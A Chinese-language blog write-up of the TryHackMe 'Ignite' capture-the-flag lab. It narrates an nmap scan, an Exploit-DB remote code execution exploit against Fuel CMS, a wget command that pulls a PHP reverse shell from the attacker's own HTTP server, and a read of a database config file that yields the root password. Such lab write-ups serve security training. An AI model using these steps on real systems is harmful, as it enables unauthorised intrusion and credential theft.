TryHackMe-Ignite

发布于 2023-01-09  338 次阅读


简介:

一家新成立的公司的 Web 服务器存在一些问题。

房间链接:

https://tryhackme.com/room/ignite#

问题:

挑战开始:

首先扫描下端口

nmap -sC -sV 10.10.29.214

发现只开放了80端口,直接访问看看

可以得知是Fuel CMS
搜索下版本漏洞,发现存在多个RCE

直接下载exp尝试利用
https://www.exploit-db.com/exploits/47138
首先更改下目标url,使用python2运行
但是发现报错了

检查下代码,发现他挂了代理,删除对应代码

再次运行,成功执行命令

这里我们还是使用反弹shell的php马
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
更改回连IP,本地开启http服务
接着使用exp执行

wget http://10.10.44.142:8000/shell.php

可以发现成功下载

访问文件,成功收到反弹的shell

改下交互,成功找到第一个flag

接着开始尝试提权,suid和capabilities提权都没有可以利用的点
返回网站
这里提到了一个数据库文件

执行命令

cd /var/www/html/fuel/application/config
cat database.php

这里获取了一个密码
尝试su root
成功切换到root
成功获取flag

答案:

届ける言葉を今は育ててる
最后更新于 2023-01-09